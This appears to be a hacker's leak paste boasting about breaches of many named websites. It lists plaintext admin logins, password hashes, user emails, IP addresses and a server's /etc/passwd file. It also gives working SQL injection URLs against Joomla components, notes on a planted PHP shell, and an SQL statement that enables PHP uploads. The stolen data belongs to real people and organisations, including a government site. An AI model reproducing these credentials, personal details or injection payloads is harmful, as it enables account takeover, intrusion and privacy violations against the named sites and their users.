agunyanbara:f35364bc808b079853de5a1e343e7159
aldojoel:f35364bc808b079853de5a1e343e7159
anbikwpd:3c0afda3a9e11bc29bde2d2fca5cbcff
ansen620:13ded9f7d85f9bd77834dc582e5a42e0
aquablue:81dc9bdb52d04dc20036dbd8313ed055
arwdhstczm:0bc2d9b7cfb841e82bba6a3badc71b42
aspasp:e10adc3949ba59abbe56e057f20f883e
ay2008:4607e782c4d86fd5364d7e4508bb10d9
aynetrum:f35364bc808b079853de5a1e343e7159
bailan668:cfac04d640c069ad851dfce7c7149f94
baili0125:b8ebeda8626e2ad3917642a7905e94e4
eccusyvlvm:d88c4bb879940c2d530a6ac5927e224a
eenroyc:f35364bc808b079853de5a1e343e7159
energy6677:1e901dcac6a8461781ced375850316e1
eqgzwnherz:ed2519db4b93097e1d9bc20a9e9eed55
erlong:ac79e8a58eb21b799550d83d0b77ce14
evankeurensuann:f35364bc808b079853de5a1e343e7159
expexySep:f66d235ee75e1cfdf439800ac26cbeeb
fancywedding:f35364bc808b079853de5a1e343e7159
fasdg:a8d12e24a2d52310347c191cd07c9607
> - - - - - - - - - - - - - - - - - - - - - 2 LAUGH . COM  - - - - - - - - - - - - - - - - - - - - - <
Target: www.2laugh.com
Login: www.2laugh.com/admin/
Admin Info: JustAdmin2008:AdminGod2000
Admin Email: support@2Laugh.com
----------------------------------------------------------------------------
Just a few User IP's:
207.46.192.99
93.172.237.153
66.30.135.12
65.52.110.45
66.249.71.38
77.88.25.26
207.46.192.99
1.202.221.1
207.46.13.92
----------------------------------------------------------------------------
User Emails:
amit@logofusion.com
ofer_a_i@netvision.net.il
webmaster@LogoFusion.com
yoav_lewy@walla.co.il

> - - - - - - - - - - - - - - - - - - - - - MOBIPASWDS.COM - - - - - - - - - - - - - - - - - - - - - <
Target: MobiPasswords.com
Admin Info: Borko:d513086494ab1c98712d1a758464b95f
--------------------------------------------------
EMAILS FROM SITE:
weathsd@earthlink.net
Michael.B.Brown@citigroup.com
bduncan_2000@hotmail.com
lsupino@videotron.ca
mmm@etim.ru
rva@gmx.ch
smlweb@uscm.org
megla@mail.ru
davidgharrington@yahoo.com
lind@arepalaw.li
a.florence@cox.net
peter.medley@comcast.net
asdfasdf@sadfasd.dsd
dedd@asdsass.ds
3Andrea3@earthlink.net
tirnanog66@gmx.de
rbarwick@ntlworld.com
steve@peterson.net
Gabriela.Mihaylova@grossmarkt-sofia.de
james@jamescookservices.com
shirleyy@vip.163.com
josepha@uccu.com
lennart.dolk@telia.com
audaxrandonneur@web.de
willem.vangestel@virgin.net
heidi.keller@itext.ch
a236729@yahoo.com
ron.sells.homes@cogeco.ca
bowlam@earthlink.net
rewirch@shaw.ca
jcolond@gmail.com
aq@bb.cc
nikola.g@gmail.com
fred@msn.com
wampi@wampi.net
martin.1@telia.com
k.dopler@aon.at
aarrieta@encontrack.com
menges@t-online.de
mu3taz@epa.org.kw
benhart@alltel.net
leigh@lckslop.com
rousea@kew.hotkey.net.au
info@buntekarte.de
info@buntekarten.de
> - - - - - - - - - - - - - - - - - - - - - CAM-CEEDS.ORG ~ - - - - - - - - - - - - - - - - - - - -  <

Courtesy of: Null
DUMP ON CAM-CEEDS.ORG
METHOD OF GAINING ACCESS: SQL Injection Attack
TOTAL USERS: 17
DB ACCESSED: camcee_1
TABLE: smf_members

Users' Dump
-----------------------------------------------------------------------------------------------------
e0ceb28aabcc2faed40fbcb5da5b7527e4f188bd        admin           The Administrator90.204.33.136  90.204.33.136           40a5
28917cf3783fa8ab67a78347f52fd14afc9b5ff5        Trevor Dunn     Yue Pan         93.152.27.250   93.152.27.250           6740
72259f3a826ae177ee4ef9ebd127dbd4dda9a59d        Rapdmx          Jun Kong        81.151.182.136  81.151.182.136          d0ab
ce2758f4f70cf5aafac8c50cfba69d568fb12809        Izium           Li Peng         129.169.154.102 129.169.154.102         84a5
9a3f9386f5879ca0a669d9c9bc1bce2a1175020c        matkicap        netkong         188.223.155.171 188.223.155.171         637e
ca2dc2f4b6b0aec46f3a08a7827b488bf92368e4        escorte         teresa.shirkova 131.111.243.142 131.111.243.142         b236
981120e64b9eedc0ef37205a0744ddc2a1ceac9f        jalalnet        Yi Yao          94.194.177.37   94.194.177.37           4521
4c4d764338b3491c24fc39e07503a0118e9c079e        榴莲          wenjingyan      131.111.243.142 131.111.243.142         994c
3a9118ccde01fe3e48f1b320098e3db9a0658e50        Binyou Liu      Binyou Liu      86.26.15.241    86.26.15.241            fb59
e5076c36677af17c8d41b17e5f5c31c68b5dde76        wenjingyan      榴莲          221.225.157.163 221.225.157.163         a272
213dd8ae01d7fb0a37eac14b41b86437fa404e65        yi.yao          jalalnet        85.237.212.4    85.237.212.4            9c0e
50bf9f2ebc0cea84130ff642cca0a745eaed25c9        teresa.shirkova escorte         216.172.142.32  216.172.142.32          b124
99dd5ad193bf1601f5a7fc3fa49147d0f9fbd602        netkong         matkicap        203.82.94.44    203.82.94.44            3f4c
20d5e56b302fa3fa3ef01aa36ce173338b07d27a        li.peng         Izium           86.100.115.94   86.100.115.94           (No salt)//WTF?
592cae06dda05b70eb993384166fc94325be974b        jun.kong        Rapdmx          86.29.185.148   86.29.185.148           c2b9
f82d5d502ada6472c29def354c84136590504459        helen   Trevor Dunn             212.44.18.77    212.44.18.77            feb6
a70f11ef634959aedb3b7a81b02dc812682482d5        ^^Sh4n3lly^^    ^^Sh4n3lly^^    120.168.1.244   120.168.1.244           0215

DATAMINE
------------------------------------------------------------------------------------------------------
Count(*) of camcee_1.smf_personal_messages is 0//There are no PMs exchanged. Sad.
Going into SESSIDs, nothing interesting. A lot of the sessions are mine. (LOL)
Going into SMF Settings. A lot of interesting stuff here. Dump below
//Need an indirect way to access the php shell. 403 error.
http://www.cam-ceeds.org/file_share.php/sharedFiles/Null_31.php//Vuln in the fileshare system. Will not display shell
SETTINGS DATA
-------------------------------------------------------------------------------------------------
SMF VERSION: 1.1.11
RESERVED NAMES: Admin Webmaster Guest root
ALLOWED EXTENTIONS: doc,gif,jpg,mpg,pdf,png,txt,zip
UPDATE smf_settings SET value='doc,gif,jpg,mpg,pdf,png,txt,zip,php' where value='doc,gif,jpg,mpg,pdf,png,txt,zip' and variable='attachmentExtensions'
UPLOAD DIRECTORY:/mnt/vol3/home/c/a/camcee/public_html/smf/attachments
> - - - - - - - - - - - - - - - - - - - - - FURSUITERS.CO.UK - - - - - - - - - - - - - - - - - - - - <
                                          
########################
### FurSuiters.Co.Uk ###
########################
Just for fun, no real
 sensitive info here.

TABLE: categories
COLUMNS: id. order. name. desc.

TABLE: clicks
COLUMNS: id. when. what. who.

TABLE: links
COLUMNS: id. cat_id. loc_id. name. url. description. added. likes. dislikes. clicks. pend. ip.

TABLE: locations
COLUMNS: id. name

> - - - - - - - - - - - - - - - - - - - CHRISTIAN WORD . NET - - - - - - - - - - - - - - - - - - - <

Target: christianword.net
This leak is absolutely harmless, just dropping tables/columns, because YOLO.

Host IP: 209.200.244.142
Active DB: mobil0_neff
Vuln Link: http://www.christianword.net/cwm/neff/main.php?id=2

TABLE: lesson 
COLUMNS: id, series, name, part, type, stamp
TABLE: newsletter
COLUMNS: id, date, title, stamp
TABLE: series
COLUMNS: id, name

> - - - - - - - - - - - - - - - >> MISC. SITES' ADMIN/DB INFORMATION. - - - - - - - - - - - - - - - <

OLDFASHIONEDBLOOMERS.COM:
Admin Login: admin:KaYla72
Admin Email: webmaster@oldfashionedbloomers.com

ICIJAPAN.COM:
Admin Login: Forum Admin:fuyu2000
Admin Email: fuyu_mtym@yahoo.co.jp

SMALLFLYINGARTS.COM
Admin Login: smallfly:warpoet1
Admin Email: smallfly@smallflyingarts.com

MAPLEPARK.COM
Admin Login: Admin:MM5FxEUDQiHjs
Admin Email: N/A

MARKETING-IDEA.ORG
Current DB: calvin69_affiliates
Admin DB User: calvin69_gkapur
Admin DB Pass: 12345

CYCU.EDU.TW
Admin Login: mphl:xu.6xu4

MULTIMANIA.FR
Admin Login: Bull:vq22FFF71AE4AF64B228E4C604F0B89EEB

COLMICH.EDU.MX
Admin Login: root:RiCs@#3465
Admin Login: gesaradm:LoBo@#11

NTLWORLD.COM
User: mi5
Pass: mi5r01

TRIPOD.COM [Admin/Employee Logins]
admin:5834
Michelle:cookie
MarYanN:chicken
fedbrown1: 43721967
Jason_Scott:bryan
paige:nino
JJ3747:sunshine
mandy:chauncey
alice:mildew
kenny:muck
bullet:cowdog

FULLNET.COM
Admin Login: memt509:7460
Admin Login: t509led:eaglesall

STONELAND.COM
Admin Login: stone:land

NUTN.EDU.TW
Admin Login: msrg:msrg1234


> - - - - - - - - - - - - - - - - - - - MONET PERFUMES ROOT - - - - - - - - - - - - - - - - - - - - <
TARGET: www.monetperfumes.com

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

named:x:25:25:Named:/var/named:/sbin/nologin

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash

rpm:x:37:37::/var/lib/rpm:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin
> - - - - - - - - - - - - - - - - - - - KAIKOURAFISHING.CO.NZ - - - - - - - - - - - - - - - - - - - -<

Target: kaikourafishing.co.nz
Exploit: Joomla 0day
Vuln: http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

Admins/emails/passwords:
Administrator:admin:wurmik@digitalarts.co.nz:23685093d2d80eec935688c715a8df45(MD5 Crypted)
HbbMS87F960QIBpjRcUtGb2TPxY6jz95:Administrator,63:Digital

Arts:digitalarts:info@digitalarts.co.nz:3c7afd2292cd46576847a5932c615450
unOI20muLkd5dBl5Q9C5B5Ps7LJDcYQW:Super

Administrator,64:Kevin:kevin:inkworx@gmail.com:70a4576cf2cd2dc5050e16e94f3a042a:
3my9HR7objofDq8TfZeX78SkzcivEU3P:Super Administrator,65:Kaikoura Fishing

Charters:kaikou:kkfishingcharters@xtra.co.nz:c92b89dcfe0edf7671f517fef67903cd:
Qb6weni25Op47AWGuQW29E3UwnP6mizc:Super Administrator

> - - - - - - - - - - - - - - - - - - - - - LEGCO.GOV.VG ~ - - - - - - - - - - - - - - - - - - - - - <
Target: www.legco.gov.vg
Full User Dump: http://pastebin.com/wxc0GwPh
In this dump: All user logins
NOTE: NOT ALL ARE LISTED IN THIS PASTE, SEEING AS THERE WERE WAAAY TOO MANY.
      FOR THE FULL LIST, PLEASE CHECK >> http://pastebin.com/wxc0GwPh <<

ADMIN: HoaAdmin:51b1c6deec9f81244fde2316dde909c9

Babulers        b00142a8d047578b9a492291ef91141b        wraclerermmen@mail.ru
BABYMYPELFFAR   bf9a5a527f05b9b55f8b5c0074325689        visitorfibas@mail.ru
BabyNames       40f9c8e78a50b03a3635f0ae6be05e7e        rare_baby_names@pop3.ru
bacikap         a4c23449f8190f7ab6a434bfdf8c6d49        business@komatoz.net
Badaycumduend   b78a57c6dc67525a5dcbe43625527b82        scettemntraft@gmail.com
bagirab         e3cc6fd9e1464861b18df8a01b4265ef        bagirab-71@mail.ru
Bagronso        8b21ca27a8cf14aca144531f30393998        caserpo@gmail.com
Bagronson       6590a26cec4ee69c3d490828948f4de2        mostrafed@gmail.com
Bahrappancy     10b36f01c9051a1c6c084ed911f0af40        roturner0@gmail.com
baibreGrigneegirl       ff11a9f2b93b6704b04930d4a7d0813c        bopexiss@mail.ru
bakcolla        8945b4cb1bfb8cb5c95c137fc60ed9a0        bakcolla@gmail.com
baleattaigN     fb9812239e39c252f0ce4cdcd1dd7a91        merafetec08@bk.ru
ballNillVEIMI   39cc6c31234d0dbf7c5710992906af7b        merakilosytera@mail.ru
bametis         44a9155c2fc4f2f1187a63a25c4fe31a        baptktz@yandex.ru
banditoshu      c6db37700a7d5db7cec16cc8721b1a28        banditos_hunter@web.de
BaphEvovall     7634ab766e0a5ba9f920ae2a824d6e8a        andartonaaren0514@gmail.com
Bargiel321      0f05a17b375f61f83f7586df76b1b7d0        linum08@tlen.pl
barokot         50601f475f6ab191723d9b37cd19a9c5        fistentz@yandex.ru
bartines        e8bffa37c052fcd5a3ac115761722bda        bartines@yandex.ru
Bartosz1494     209701b7e3c159d3ddc48db0992f44fe        djunior112@o2.pl
bashkans        b4b1b0992601024fb7cec09506ccd629        bashkans@yandex.ru
BassecasePoix   1cf61af7ad361fc89251d7a3bfe39f40        dimoninteronskiy@mail.ru
bastanol        3d7ec84b20668c2d276371805de3def2        loo@abiens.ru
basyemannaDib   8380b7bb0bb8257de788705120390f87        rehoardeev19394@mail.ru
BatBralkkig     363373f014c5891e908010be0ea4c512        fontan170@mymail-in.net
bavmops         65b511205198b07e3a84a581b46c9d93        lookocve@yandex.ru
BaxyBiday       9fab8c9d5dc6490fe5a2d1c162fb4245        jassinajuts@mail.ru
bballer         917590a3cf6b1f561af757e843831740        bballer1@aaol.com
BBNSeisOOemsn   2f79be8c33a1d6db7fbe42dde4abc5e1        lesbiansexpics7@hotpop.com
beafterteve     7257e54ed7e30bed368d1fad19a33cd2        renianity@mail.ru
beaubybiony     7c151db9b9c742f5177ae9185d43ec0b        retakilomyter@mail.ru
beawayhoowl     05b4d7692a44315df478cb7653ae6df7        tiewnippenis@gawab.com
becilone        cc65b12561f4a2712cd611745e36b1a2        becilone@ya.ru
BedeDrepe       452894ec0904dbc6ef128ab477d742b1        busyastense@mail.ru
bedLolveflese   e6cd5baabc040f8f210df06dbb74e547        jeremyrichardsondd@gmail.com
bedoreova       7dbbedf98304abd53a6cb454b67fa2c7        caitlschul5@mymail-in.net
Beek    1ac23cd843cdacccb12da3b6668a1810        qibowu@mail.ru

>>>>> The Rest Are Cut From Here [WAY TOO FUCKING MANY] <<<<<
> - - - - - - - - - - - - - - - - - - - - -   ADDR.RU HACK - - - - - - - - - - - - - - - - - - - - - <

Target: www.addr.ru
Exploit: Joomla 0day
Vuln: http://addr.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=/etc/passwd&aid=-1/**/union/**/select/**/%200,concat_ws(0x3a,email,username,name,password,usertype,block),0,0,0,0,0,0,0,0,0,%200,0,0,0,0,0,0,0,0+from+jos_users--

FULL USER DUMP: http://pastebin.com/dzUurtp9

NOTE: NOT ALL ARE LISTED IN THIS PASTE, SEEING AS THERE WERE WAAAY TOO MANY.
      FOR THE FULL LIST, PLEASE CHECK >> http://pastebin.com/dzUurtp9 <<

Emails, users, passwords:
Admin login -
fxmonster@gmail.com:admin:Administrator:ae7d734566aca79a92407a7baa897918:EnQxXjNOiyRIHor2:Registered:1

Regular users -

sbpskov@yandex.ru:asbpskove:asbpskove:03fe72a57bb0d3b1175d2fac13db4ce4:C0DMlinI1KDS73XS::1
doctorvlom@ukr.net:Dr. vLOM:???????:36c4b220c80d0ee6e86cf18c8afe5e5f:rvsotUlxlMc9TIH1::0
valera14@ukr.net:valera11:valera:587e93037e7bfcbe9c39a43e7dd7d3d4:KnsxMzqYXmxQd9XJ::0
abusinec@yandex.ru:abusinec:abusinec:2314823ccf476171d5f43d225795b14f:BHjH1vAhWf9aF3XJ::1
altaevaa@mail.ru:altaevaa:????????:a5c64e37a401a5888ec5797127cd053c:Fb26BXaWHgdlLpqD::1
SleepSleepSleep@yandex.ru:Sleepcoolhack:Sleep:329cdd5dbcf6b065c68598f8c7928bc1:hQOQqcVoRAd4qTdV::0
sasooza@gmail.com:naruto:Zaripov Emil:a0de51f4852fcbcdd3695acd7a76b4d0:qIFUeJsFsCNTyeLS::1
mozg.a@mail.ru:MozG:MozG:711ff47963526229d3a171b6269a0a58::0
natik.mamedov@mail.ru:Sleep:Sleep:4cdddb1de7e4acf8004e425b7b7d2ec2::0
XiDac@narod.ru:XiDac:XiDac:eac1ea089edc46763acd2175424053d4:lzT3xHSUAN9eKmCi::0
samatron88@mail.ru:samatron:?????:0818c9c98cd8536735a3c0a59a28077c::0
minarett@mail.ru:Minaret:???????:90954349a0e42d8e4426a4672bde16b9::1
supervisorx@gmail.com:jekill:jekill:6db8b4dee20a1bfc1cc75309ef258083::0
anim@gmail.ru:anim:anim:9812dbc0830e5c8d0ecf241fdf3673d1::0
eritinov@mail.ru:VitusMan:???????:25f9e794323b453885f5181f1b624d0b::0
rashen@list.ru:maroder13:Scipion:dae03635e63fc2d35e53580ef4f21eaa::0
hapni@bk.ru:alexl:alexl:4c4e65bb11e628e0383351d2eeb37fca::0
max185@rambler.ru:oxid:????:a2a1365fca48ebfd5c629849ba731895::0
Sansel@rin.ru:Sansel:Sansel:b0d06b6f1432875ff613d2f0a8666ba8::0
manson.marilyn@mail.ru:marilyn:Menson:9da4698b7aa2e96c66643a36408989a1::1
Ridrik@mail.ru:???????????:?????:aa7143aad8a3831b3f4ec8666749e4bc::1
mr.morgat@mail.ru:Demas:???????:d820bd12e2eec2ccc2403777eec0e025::1
ilhar@mail.ru:????:??????? ????:cc6c917ac67026923507cfd2fa279e08::1
i.k.a.r@mail.ru:Outlawrace:???????:69c6edbc2154bb2e34dbe50297d915bf::1
dimoshek@mail.ru:????:????:d7af994f1f1ef8b5e3beb9f7fb139f57::1
toxaua@mail.ru:kashtan:kashtan:38b0704acda5b8f942fda288aec6c8a5::1
hangover@ngs.ru:sppill:sppill:96dbee2be3c89c3a775c9705a756e339::1

>> ONCE MORE, THERE WERE WAY TOO FUCKING MANY, SO THEY WILL BE IN A SEPARATE PASTE. <<


> - - - - - - - - - - - - - - - - - SOME [encrypted] PASSES. - - - - - - - - - - - - - - - - - - - - <
>> www.atriumcaterers.com <<
atriumcater:fqLIAPBmw.w3I

>> www.leapgeeks.com <<
leapfactor:$1$z5qkZHnp$nK7IimuZvSdyT3HS9bhZc1

>> bergeret.org <<
fabien:QSxunQNXS6BNo.

>> mmauniverse.com <<
mma:YG95o7c/2DGE2.

>> insynq.com <<
4iq:MCLjXovLUZ4aE
jamesl:EPYLCZt.0zlxE
jimt:RhvgmsjNSoLF.
johng:YvV3pEYZWvXx6
jamesm:CSMJAkF7yyHAA
chadg:ysG2Cd7cCVqtM
michaels:iPt3MCFvfjv5s
hlands:LbMzz54YsibKs
larryb:gsda6cnVdHRzk
saraj://J.e2johP0iY
lowellc:URTtuo9xIdPaM
bbco:f0dC9FGthcyVQ
rodw:lv8IWRVakBNM6
bayacct:LTa7QKIexkYco
christ:e1kOmi2zAqoLk
jordanh:31ljtZHPuFCDI
markr:vFQv8leCF5.rE
stevea:KZSUcBpL1n9R2
jimf:Swc04qb5DS376
marketpower:Ul/x6fncVpvAQ
SteveA:cB4u/tmEjdP3c
ken:N3qZs/2N3G3sQ
cmt:$apr1$eWbCB...$/mRJc6yihFNbs0BRlLbUY0
axion:$1$gmRFkNCZ$AXFgP3E7V/X48ZRxoaOS91

>> mine.nu <<
ftp_login:$1$mYGW54oI$NPXbUZTxZIDLSd41ptoPR.:1003:1003::/home/ftp/ftp_login:/bin/false

>> glinx.com <<
zinck:aUsyDUIPPRpL2.


>> http://www.ctrides.com <<
mlempitsky@rideshare.com:bQKTm3aSFiTJY
phypolite@rideshare.com:5FqPEHdwahqTk
knaples@rideshare.com:q7hdE8io61SQk
lpetry@rideworks.com:A4QcKRZAq4pbE
tcahill@rideworks.com:TeIHh87Cm2wk.
maarons@metropool.com:rXXsVv0XpJ8rU
sdownes@rideshare.com:IQRklQQpbNA7o
admin:s2.gw3DCJaOFY
shane@rideshare.com:IT4HW7JNBtoME
blevy@rideworks.com:rndX6i4PINu9g
psakofs@metropool.com:bX3CnfnAzveFI
lsoucy@cronin-co.com:AhCOacZ8nUBsI
jmello@rideshare.com:qmqssQx2sBiiU
toc:toIP8LcsppNPI
metropool:bX3CnfnAzveFI

>> www.bayardadtools.com <<
admin:.5hpjMeXy.peQ
triplecrown:SVw4c8FEfX7Ko
dailyexpress:gaqy6AwkbB6ZE
amgen:QOTuPnbYsqjmY
NYC:CC8ICUPYEhm3I
amer_red_cross:cjtvsT4fbhbew
SPG:nnUPhRut134Qs
bard:CJjcFlbzxYQYc
FMS:DV4ZIyctCa.Z6
CA:5sGqwQUKrYRE2
fosterwheeler:GpreVXqPyHbco
federal:R.Wzr7B7VOYas
parkway:.0c3V9rRWR982
carefirst:juYaOpGHEi7ww
mndcecards:BWE9owcU8C0Ds
rfp:BbTPK0kwI9pFY
lincoln:Bw7Pjb7J018lM
jpmorganchase:Y6pRHcQv48vDA
gbmc:sUf5kmbGs8Ark
1stinvestors:5yIEL1bPlm2k.
nations:K2.C/vlBGV8Rg
modells:hiSw7bl02PczA
centralparking:8CskMWTm2qz7w
comcast:o0y5lcp3ZVQqY
janco:jkCLxekXS37YA
covance:fGOW0GLQ9S/.E
dellafemina:xMm7OKwMGs7W6
farmers:u6h8Mcx.oLlIQ
cobank:7LWsyRMNoUe8Y
visitor:wdRv6tow/SRtU
sherman:3kkY/XZK331tY
MCC:.aSnftrya4a5U
CPS:ntbOnhXibvcRg
webstandards:XsXYCWJHKS5MQ
copper:M4E4Sir53V7bA
sherwood:ZR5aycI6QxQCg
intrawest:KF9A.PytzVGak
sanofiaventis:MmGwlViwjo2bY
bayonne:KnOVXVfG5QZbU
bayada:uXQWebXKt4Pys
goodrich:LEhlu4.wzMh6w
douglas:UorS9oDM1Ny8w
smsholdings:2dVPvNav3qGG6
kforce:mN9660KoL06BE
hertz:xwTcQY6fm8Vns
allina:bUtpWbhjdHT.Q
ADP:KkVBXOn/ztBMM
orbital:DGnPwu0z9gi9A
pfizer:8XT0V9maSYiz6
gilariver:9sWyEevyQIefk
gatton:5sjjv0CK/HoWw
trucking:CZ/3sq5xYhAfE
msmc:0QXic8lDSq2a6
celadon:9L3SrxP93x6WM
pfizerrfi:xuy8/0KnA0rgI
TRL:QLJNi5BqxMSn2
barrnunn:dL/DUPeJ9kMt.
texas:s.Z0V/XnREJNE
verizon:RdS5gYAhR8iUo
L3:phpw35063KLao
aramco:A8du5fyBRjo3g
711:a086LKVeh.J.w
denver:GPVnZCQbkFkL2
uofk:.BFifxjulFlHU
banner:i47Wlp1oEWpCI
healthquest:pcmYUfgeHvvdI
overlook:uREJcZ6ycSNh.
orlando:skXzLM5s27n0o
bluecross:nNDDxQwFUbkkI
cogin:hxSd0TxaZSiAY
NVR:sp38c.uBbASLU
washington:9uvlQBj.XfBmo
black:4p9X4P2wd6YPk
blackanddecker:jkk0KwXIXfyZ6
TLC:BAqF1KryzKzQM
thales:ifEQsRFTQpPmI
keiser:tqQJgMKq9QiSQ
motions:19DRSxy5UQDX2
overlake:IPEaUavk.srGo
pantry:5AM2mxZMhkt4s
PRA:FoFN9gsS.W7pc
whiteplains:xBQci.m6dkLBE
nywriters:AHMGtseLTe8/w
NYFTP:zn1MGVYkWgfn.
koch:TI2OjKeEu0WHk
entergy:SFYjnud2yK8No
btools:ROVoyGAu5Bo5Y
capgroup:SlngXsr8UJd72
midamerican:pAtp5m1jzYqxk
jupiter:6ZfQOtR/2aRzg
shaw:jEcJit6OAuLjM
cityofhope:IlZ0XgQaWp5dU
orlandoftp:lJXCvrUF4KNlA
autonation:MOuyGISQRqbKg
coggin:RMvY4KC37S0kA
groendyke:dJbgMxhw7YOME
template:OWn4RmwYX/0dI
infinity:R1n8F1YXphwqw
sanofi:vw58lh6Ta1goo
bayardad:/maYPwk/.TlRc